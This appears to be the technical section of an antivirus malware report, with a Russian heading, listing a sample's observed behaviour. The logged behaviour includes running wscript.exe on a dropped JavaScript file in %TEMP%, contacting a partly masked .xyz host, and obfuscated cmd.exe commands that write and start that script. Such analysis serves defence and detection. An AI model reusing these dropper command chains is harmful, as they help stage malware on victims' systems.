Техническая информация
- '<SYSTEM32>\wscript.exe' %TEMP%\cvjhfd2.js
- %TEMP%\cvjhfd2.js
- nul
- http://85####.xvdgfe.xyz/?02#
- DNS ASK 85####.xvdgfe.xyz
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p Jrbmzxx="%VPA:IADYI=%%t2869aI:1DOLZ=/%" 0<nul 1>%TEMP%\cvjhfd2%yetg%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" md \ |"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo stArt <SYSTEM32>\wsCript.eXe %TEMP%\cvjhfd2%yetg%s"
- '<SYSTEM32>\cmd.exe'